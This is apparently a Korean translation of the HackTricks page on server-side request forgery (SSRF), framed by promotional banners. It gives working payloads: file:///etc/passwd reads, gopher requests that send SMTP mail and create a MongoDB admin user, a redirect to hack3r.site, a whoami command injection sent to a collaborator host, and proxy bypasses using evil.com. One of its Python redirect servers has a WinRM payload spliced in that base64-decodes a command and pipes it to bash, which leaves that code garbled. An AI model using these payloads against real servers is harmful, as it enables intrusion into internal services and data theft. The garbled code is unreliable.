SSRF (Server Side Request Forgery)

Trickest를 사용하여 세계에서 가장 고급 커뮤니티 도구를 활용한 워크플로우를 쉽게 구축하고 자동화하세요. 오늘 바로 액세스하세요:

Automate OffSec, EASM, and Custom Security Processes | Trickest

제로부터 영웅이 될 때까지 AWS 해킹을 배우세요 htARTE (HackTricks AWS Red Team 전문가)와 함께!

HackTricks를 지원하는 다른 방법:

회사가 HackTricks를 광고하길 원하거나 PDF로 HackTricks를 다운로드하려면 구독 요금제를 확인하세요!
공식 PEASS & HackTricks 스왜그를 구매하세요
PEASS Family를 발견하세요, 당사의 독점 NFTs 컬렉션
💬 Discord 그룹 또는 텔레그램 그룹에 가입하거나 트위터 🐦 @carlospolopm를 팔로우하세요.
HackTricks 및 HackTricks Cloud github 저장소에 PR을 제출하여 해킹 트릭을 공유하세요.

기본 정보

서버 측 요청 위조 (SSRF) 취약점은 공격자가 서버 측 응용 프로그램을 조작하여 원하는 도메인으로 HTTP 요청을 보내도록 하는 경우 발생합니다. 이 취약점은 공격자가 지시하는 임의의 외부 요청을 서버에 노출시킵니다.

SSRF 캡처

할 일은 당신이 생성한 SSRF 상호 작용을 캡처하는 것입니다. HTTP 또는 DNS 상호 작용을 캡처하려면 다음과 같은 도구를 사용할 수 있습니다:

Burp Collaborator
pingb
canarytokens
interractsh
http://webhook.site
https://github.com/teknogeek/ssrf-sheriff
http://requestrepo.com/
https://github.com/stolenusername/cowitness
https://github.com/dwisiswant0/ngocok - ngrok를 사용하는 Burp Collaborator

화이트리스트된 도메인 우회

보통 SSRF가 특정 화이트리스트된 도메인이나 URL에서만 작동하는 것을 발견할 것입니다. 다음 페이지에서는 그 화이트리스트를 우회하기 위한 기술 모음을 제공합니다:

pageURL Format Bypass

오픈 리디렉트를 통한 우회

서버가 올바르게 보호되어 있다면 웹 페이지 내부의 오픈 리디렉트를 악용하여 모든 제한을 우회할 수 있습니다. 웹 페이지는 동일한 도메인으로의 SSRF를 허용하고 아마도 리디렉트를 따를 것이므로 내부 리소스에 액세스하도록 서버를 만들기 위해 오픈 리디렉트를 악용할 수 있습니다. 자세한 내용은 여기를 참조하세요: https://portswigger.net/web-security/ssrf

프로토콜

file://
URL scheme file://은 /etc/passwd를 직접 가리킵니다: file:///etc/passwd
dict://
DICT URL scheme은 DICT 프로토콜을 통해 정의 또는 단어 목록에 액세스하는 데 사용된다고 설명됩니다. 특정 단어, 데이터베이스 및 항목 번호를 대상으로 하는 구성된 URL 및 PHP 스크립트의 잘못된 사용 사례가 제시되었습니다: dict://<generic_user>;<auth>@<generic_host>:<port>/d:<word>:<database>:<n>
SFTP://
안전한 파일 전송을 위한 프로토콜로 식별되며, PHP 스크립트가 악의적인 SFTP 서버에 연결하는 방법을 보여주는 예제가 제공됩니다: url=sftp://generic.com:11111/
TFTP://
UDP 상에서 작동하는 Trivial File Transfer Protocol은 PHP 스크립트가 TFTP 서버로 요청을 보내도록 설계된 예제로 언급됩니다. 'generic.com'의 '12346' 포트로 'TESTUDPPACKET' 파일에 대한 TFTP 요청이 수행됩니다: ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET
LDAP://
이 세그먼트는 IP 네트워크 상에서 분산 디렉터리 정보 서비스를 관리하고 액세스하는 데 사용되는 경량 디렉터리 액세스 프로토콜을 다루며, 로컬호스트의 LDAP 서버와 상호 작용하는 방법을 강조합니다: '%0astats%0aquit' via ssrf.php?url=ldap://localhost:11211/%0astats%0aquit.
SMTP
SSRF 취약점을 악용하여 로컬호스트의 SMTP 서비스와 상호 작용하는 방법이 설명되어 있으며, 내부 도메인 이름을 공개하고 해당 정보를 기반으로 추가 조사 조치를 취하는 단계가 포함되어 있습니다.

From https://twitter.com/har1sec/status/1182255952055164929
1. connect with SSRF on smtp localhost:25
2. from the first line get the internal domain name 220[ http://blabla.internaldomain.com ](https://t.co/Ad49NBb7xy)ESMTP Sendmail
3. search[ http://internaldomain.com ](https://t.co/K0mHR0SPVH)on github, find subdomains
4. connect

Curl URL globbing - WAF 우회
만약 SSRF가 curl에 의해 실행된다면, curl은 URL globbing이라는 기능을 가지고 있는데, 이는 WAF를 우회하는 데 유용할 수 있습니다. 예를 들어, 이 writeup에서는 file 프로토콜을 통한 경로 순회의 예제를 찾을 수 있습니다.

file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}

Gopher://
Gopher 프로토콜의 IP, 포트 및 바이트를 지정하여 서버 통신을 할 수 있는 능력에 대해 설명하고, Gopherus 및 remote-method-guesser와 같은 툴을 사용하여 페이로드를 작성하는 방법을 다룹니다. 두 가지 다른 사용 방법이 설명됩니다:

Gopher://

이 프로토콜을 사용하면 서버가 보내도록 원하는 IP, 포트 및 바이트를 지정할 수 있습니다. 그런 다음 기본적으로 SSRF를 이용하여 어떤 TCP 서버와도 통신할 수 있습니다 (다만 먼저 서비스와 대화하는 방법을 알아야 합니다). 다행히도 Gopherus를 사용하여 여러 서비스에 대한 페이로드를 생성할 수 있습니다. 또한 remote-method-guesser를 사용하여 Java RMI 서비스를 위한 gopher 페이로드를 생성할 수 있습니다.

Gopher smtp

ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AHYou didn't say the magic word !
.
QUIT

고퍼 HTTP

#For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body

Gopher SMTP — 1337에 백 커넥션 연결

redirect.php

<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>Now query it.
https://example.com/?q=http://evil.com/redirect.php.

Gopher MongoDB -- 사용자를 만들어 username=admin, password=admin123 및 권한=관리자로 설정

# Check: https://brycec.me/posts/dicectf_2023_challenges#unfinished
curl 'gopher://0.0.0.0:27017/_%a0%00%00%00%00%00%00%00%00%00%00%00%dd%0
7%00%00%00%00%00%00%00%8b%00%00%00%02insert%00%06%00%00%00users%00%02$db%00%0a
%00%00%00percetron%00%04documents%00V%00%00%00%030%00N%00%00%00%02username%00%
06%00%00%00admin%00%02password%00%09%00%00%00admin123%00%02permission%00%0e%00
%00%00administrator%00%00%00%00'

Referrer 헤더 및 기타를 통한 SSRF

서버의 분석 소프트웨어는 종종 Referrer 헤더를 기록하여 들어오는 링크를 추적하는데, 이는 애플리케이션을 SSRF 취약점에 노출시키는 실수를 일으킬 수 있습니다. 이는 이러한 소프트웨어가 Referrer 헤더에 언급된 외부 URL을 방문하여 추천 사이트 콘텐츠를 분석할 수 있기 때문입니다. 이러한 취약점을 발견하기 위해 Burp Suite 플러그인 "Collaborator Everywhere"를 사용하는 것이 좋으며, 이는 분석 도구가 Referer 헤더를 처리하는 방식을 활용하여 잠재적인 SSRF 공격 표면을 식별합니다.

인증서에서 SNI 데이터를 통한 SSRF

어떤 백엔드에도 연결할 수 있는 구성 오류는 다음과 같은 Nginx 구성 예제로 설명됩니다:

stream {
server {
listen 443;
resolver 127.0.0.11;
proxy_pass $ssl_preread_server_name:443;
ssl_preread on;
}
}

이 구성에서는 Server Name Indication (SNI) 필드의 값이 백엔드 주소로 직접 사용됩니다. 이 설정은 Server-Side Request Forgery (SSRF) 취약점을 노출시키며, 단순히 SNI 필드에 원하는 IP 주소 또는 도메인 이름을 지정하여 악용할 수 있습니다. openssl 명령을 사용하여 internal.host.com과 같은 임의의 백엔드에 연결을 강제하는 악용 예시가 아래에 제공됩니다:

openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf

Wget 파일 업로드

명령 삽입을 사용한 SSRF

다음과 같은 payload를 시도해볼 가치가 있습니다: url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`

PDF 렌더링

웹 페이지가 제공한 정보로 PDF를 자동으로 생성하는 경우, PDF 생성기(서버)에서 실행될 JS를 삽입할 수 있으며, PDF를 생성하는 동안 SSRF를 악용할 수 있습니다. 여기에서 자세한 정보를 확인하세요.

SSRF에서 DoS로

여러 세션을 생성하고 세션에서 SSRF를 이용하여 무거운 파일을 다운로드하려고 시도합니다.

SSRF PHP 함수

pagePHP SSRF

Gopher로의 SSRF 리디렉션

일부 악용에서 리디렉트 응답을 보내야 할 수도 있습니다 (다른 프로토콜인 gopher를 사용할 수도 있음). 여기에서 리디렉트 응답을 보내기 위한 다양한 파이썬 코드가 제공됩니다:

# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

class MainHandler(BaseHTTPRequestHandler):
def do_GET(self):
print("GET")
self.send_response(301)
```html
<details>
  <summary>Click to expand</summary>
  <p>Header</p>
    <p>Method</p>
      <a>To</a>HTTP://192.168.1.1:5986/wsmans/
      <w:ResourceURI s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing</w:ResourceURI>
      <a:ReplyTo>
        <a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
      </a:ReplyTo>
      <a:Action>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous/ExecuteShellCommand</a:Action>
      <w:MaxEnvelopeSize s:mustUnderstand="true">10240</w:MaxEnvelopeSize>
      <a:MessageID>uuid:0AB58087-C2C3-0005-0000-00000010000</a:MessageID>
      <w:OperationTimeout>PT1M30S</w:OperationTimeout>
      <w:Locale xml:lang="en-us" s:mustUnderstand="false" />
      <p:DataLocale xml:lang="en-us" s:mustUnderstand="false" />
      <w:OptionSet s:mustUnderstand="true" />
      <w:SelectorSet>
        <w:Selector Name="__cimnamespace">root/scx</w:Selector>
      </w:SelectorSet>
  <p>Body</p>
    <p>ExecuteShellCommand_INPUText</p>
      <p:Command>echo -n YmFzaCAtZCB8IGJhc2g= | base64 -d | bash</p:Command>
      <p:Timeout>0</p:Timeout>
    </p:ExecuteShellCommand_INPUT>
  </p:Body>
</details>

self.end_headers()

httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
httpd.serve_forever()

from flask import Flask, redirect
from urllib.parse import quote
app = Flask(__name__)

@app.route('/')
def root():
return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)

if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)

Trickest를 사용하여 세계에서 가장 고급 커뮤니티 도구로 구동되는 워크플로우를 쉽게 구축 및 자동화하세요. 오늘 액세스하세요:

Automate OffSec, EASM, and Custom Security Processes | Trickest

Misconfigured proxies to SSRF

이 게시물에서의 트릭.

Flask

Flask 프록시 취약 코드

```python from flask import Flask from requests import get

app = Flask('main') SITE_NAME = 'https://google.com'

@app.route('/', defaults={'path': ''}) @app.route('/path:path')

def proxy(path): return get(f'{SITE_NAME}{path}').content

if name == "main": app.run(threaded=False)

</details>

Flask는 **`@`**를 초기 문자로 사용할 수 있게 해줍니다. 이를 통해 **초기 호스트 이름을 사용자 이름**으로 만들고 새로운 것을 주입할 수 있습니다. 공격 요청:
```http
GET @evildomain.com/ HTTP/1.1
Host: target.com
Connection: close

Spring Boot

취약한 코드:

요청의 경로를 문자 ; 로 시작할 수 있어 @ 를 사용하여 새 호스트를 주입할 수 있는 것이 가능하다는 것을 발견했습니다. 공격 요청:

GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close

PHP 내장 웹 서버

PreviousSecond Order Injection - SQLMap NextURL Format Bypass

Last updated 2 days ago